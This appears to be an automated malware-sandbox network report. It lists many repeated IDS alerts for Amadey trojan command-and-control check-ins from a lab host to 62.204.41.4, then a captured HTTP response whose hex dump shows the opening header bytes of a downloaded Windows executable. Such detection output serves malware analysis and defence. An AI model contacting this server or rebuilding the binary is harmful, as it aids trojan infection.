ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450111802027700 02/07/23-19:58:56.896574
SID:	2027700
Source Port:	50111
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450463802027700 02/07/23-20:00:33.458704
SID:	2027700
Source Port:	50463
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450117802027700 02/07/23-19:58:58.328195
SID:	2027700
Source Port:	50117
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450469802027700 02/07/23-20:00:34.879330
SID:	2027700
Source Port:	50469
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449755802027700 02/07/23-19:57:18.963514
SID:	2027700
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450200802027700 02/07/23-19:59:20.859043
SID:	2027700
Source Port:	50200
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450206802027700 02/07/23-19:59:23.596825
SID:	2027700
Source Port:	50206
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449951802027700 02/07/23-19:58:13.482140
SID:	2027700
Source Port:	49951
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450285802027700 02/07/23-19:59:46.406219
SID:	2027700
Source Port:	50285
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449939802027700 02/07/23-19:58:10.592369
SID:	2027700
Source Port:	49939
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450022802027700 02/07/23-19:58:33.047755
SID:	2027700
Source Port:	50022
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450374802027700 02/07/23-20:00:10.203248
SID:	2027700
Source Port:	50374
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449905802027700 02/07/23-19:58:00.330109
SID:	2027700
Source Port:	49905
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450196802027700 02/07/23-19:59:19.903167
SID:	2027700
Source Port:	50196
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450066802027700 02/07/23-19:58:45.929274
SID:	2027700
Source Port:	50066
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450351802027700 02/07/23-20:00:04.658670
SID:	2027700
Source Port:	50351
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450173802027700 02/07/23-19:59:14.605094
SID:	2027700
Source Port:	50173
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450392802027700 02/07/23-20:00:14.550844
SID:	2027700
Source Port:	50392
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449816802027700 02/07/23-19:57:35.633778
SID:	2027700
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450262802027700 02/07/23-19:59:38.726303
SID:	2027700
Source Port:	50262
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449793802027700 02/07/23-19:57:30.034311
SID:	2027700
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450084802027700 02/07/23-19:58:50.307278
SID:	2027700
Source Port:	50084
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449882802027700 02/07/23-19:57:54.716706
SID:	2027700
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450257802027700 02/07/23-19:59:37.493308
SID:	2027700
Source Port:	50257
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449704802027700 02/07/23-19:57:06.319925
SID:	2027700
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449923802027700 02/07/23-19:58:06.395394
SID:	2027700
Source Port:	49923
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449971802027700 02/07/23-19:58:18.215583
SID:	2027700
Source Port:	49971
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450127802027700 02/07/23-19:59:00.745196
SID:	2027700
Source Port:	50127
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450323802027700 02/07/23-19:59:55.559779
SID:	2027700
Source Port:	50323
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450412802027700 02/07/23-20:00:19.610273
SID:	2027700
Source Port:	50412
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449727802027700 02/07/23-19:57:12.532928
SID:	2027700
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450168802027700 02/07/23-19:59:13.420495
SID:	2027700
Source Port:	50168
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450038802027700 02/07/23-19:58:36.760813
SID:	2027700
Source Port:	50038
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450234802027700 02/07/23-19:59:31.956332
SID:	2027700
Source Port:	50234
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449745802027700 02/07/23-19:57:16.898023
SID:	2027700
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450216802027700 02/07/23-19:59:27.644779
SID:	2027700
Source Port:	50216
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450364802027700 02/07/23-20:00:07.781571
SID:	2027700
Source Port:	50364
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450435802027700 02/07/23-20:00:26.957152
SID:	2027700
Source Port:	50435
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450453802027700 02/07/23-20:00:31.268227
SID:	2027700
Source Port:	50453
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449834802027700 02/07/23-19:57:39.774939
SID:	2027700
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450346802027700 02/07/23-20:00:03.180456
SID:	2027700
Source Port:	50346
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450050802027700 02/07/23-19:58:39.622154
SID:	2027700
Source Port:	50050
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450305802027700 02/07/23-19:59:51.225446
SID:	2027700
Source Port:	50305
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450180802027700 02/07/23-19:59:16.281335
SID:	2027700
Source Port:	50180
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450186802027700 02/07/23-19:59:17.709490
SID:	2027700
Source Port:	50186
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450183802027700 02/07/23-19:59:16.984626
SID:	2027700
Source Port:	50183
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450094802027700 02/07/23-19:58:52.753337
SID:	2027700
Source Port:	50094
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450275802027700 02/07/23-19:59:42.829008
SID:	2027700
Source Port:	50275
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449803802027700 02/07/23-19:57:32.447940
SID:	2027700
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450097802027700 02/07/23-19:58:53.510976
SID:	2027700
Source Port:	50097
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450015802027700 02/07/23-19:58:31.307259
SID:	2027700
Source Port:	50015
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450336802027700 02/07/23-19:59:58.703262
SID:	2027700
Source Port:	50336
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449974802027700 02/07/23-19:58:18.969301
SID:	2027700
Source Port:	49974
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449977802027700 02/07/23-19:58:19.705616
SID:	2027700
Source Port:	49977
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450247802027700 02/07/23-19:59:35.069047
SID:	2027700
Source Port:	50247
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449714802027700 02/07/23-19:57:10.084490
SID:	2027700
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449885802027700 02/07/23-19:57:55.454532
SID:	2027700
Source Port:	49885
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450155802027700 02/07/23-19:59:10.245942
SID:	2027700
Source Port:	50155
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449888802027700 02/07/23-19:57:56.245210
SID:	2027700
Source Port:	49888
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449806802027700 02/07/23-19:57:33.169488
SID:	2027700
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450422802027700 02/07/23-20:00:23.830241
SID:	2027700
Source Port:	50422
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450425802027700 02/07/23-20:00:24.567398
SID:	2027700
Source Port:	50425
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449799802027700 02/07/23-19:57:31.508216
SID:	2027700
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450244802027700 02/07/23-19:59:34.357275
SID:	2027700
Source Port:	50244
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450333802027700 02/07/23-19:59:57.984722
SID:	2027700
Source Port:	50333
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449908802027700 02/07/23-19:58:01.073849
SID:	2027700
Source Port:	49908
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450040802027700 02/07/23-19:58:37.231251
SID:	2027700
Source Port:	50040
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450199802027700 02/07/23-19:59:20.621768
SID:	2027700
Source Port:	50199
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449796802027700 02/07/23-19:57:30.765231
SID:	2027700
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450288802027700 02/07/23-19:59:47.126534
SID:	2027700
Source Port:	50288
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450308802027700 02/07/23-19:59:51.952268
SID:	2027700
Source Port:	50308
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450158802027700 02/07/23-19:59:10.996736
SID:	2027700
Source Port:	50158
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450028802027700 02/07/23-19:58:34.553699
SID:	2027700
Source Port:	50028
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450069802027700 02/07/23-19:58:46.668672
SID:	2027700
Source Port:	50069
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449920802027700 02/07/23-19:58:04.285165
SID:	2027700
Source Port:	49920
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450349802027700 02/07/23-20:00:04.188949
SID:	2027700
Source Port:	50349
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449831802027700 02/07/23-19:57:39.071348
SID:	2027700
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450219802027700 02/07/23-19:59:28.398284
SID:	2027700
Source Port:	50219
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449701802027700 02/07/23-19:57:04.541289
SID:	2027700
Source Port:	49701
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449742802027700 02/07/23-19:57:16.147994
SID:	2027700
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450012802027700 02/07/23-19:58:30.553987
SID:	2027700
Source Port:	50012
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450361802027700 02/07/23-20:00:07.031777
SID:	2027700
Source Port:	50361
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450438802027700 02/07/23-20:00:27.675588
SID:	2027700
Source Port:	50438
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449819802027700 02/07/23-19:57:36.373215
SID:	2027700
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449949802027700 02/07/23-19:58:13.013964
SID:	2027700
Source Port:	49949
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450142802027700 02/07/23-19:59:07.121016
SID:	2027700
Source Port:	50142
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450101802027700 02/07/23-19:58:54.467418
SID:	2027700
Source Port:	50101
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450450802027700 02/07/23-20:00:30.549660
SID:	2027700
Source Port:	50450
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450272802027700 02/07/23-19:59:41.450711
SID:	2027700
Source Port:	50272
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450231802027700 02/07/23-19:59:31.231345
SID:	2027700
Source Port:	50231
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450320802027700 02/07/23-19:59:54.828975
SID:	2027700
Source Port:	50320
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:57:03 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 